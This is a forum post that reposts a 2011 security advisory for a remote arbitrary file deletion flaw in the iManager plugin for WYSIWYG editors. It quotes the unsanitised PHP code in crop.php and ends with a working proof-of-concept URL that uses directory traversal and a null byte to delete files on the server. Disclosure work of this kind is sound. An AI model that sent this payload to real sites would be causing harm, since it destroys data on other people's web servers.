Gonzalez Posted September 17, 2011 Report Share Posted September 17, 2011 iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion VulnerabilityVendor: net4visions.comProduct web page: http://www.net4visions.comAffected version: <= 1.2.8 Build 02012008Summary: With iManager you can manage your files/images on your webserver,and it provides user interface to most of the phpThumb() functions. It workseither stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,htmlAREA, Xinha and FCKeditor.Desc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is notproperly sanitised before being used to delete files. This can be exploitedto delete files with the permissions of the web server via directory traversalsequences passed within the 'd' parameter.======================================================================/scripts/phpCrop/crop.php:----------------------------------------------------------------------32: if( isset($_REQUEST['s']) ) {33: //delete previous temp files 34: $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE); 35: if ( is_array ( $matches ) ) {36: foreach ( $matches as $fn) {37: @unlink($fn);38: }39: }======================================================================Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail comAdvisory ID: ZSL-2011-5043Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php15.09.2011--http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00 Quote Link to comment Share on other sites More sharing options...
LLegoLLaS Posted September 17, 2011 Report Share Posted September 17, 2011 sursele chars Quote Link to comment Share on other sites More sharing options...
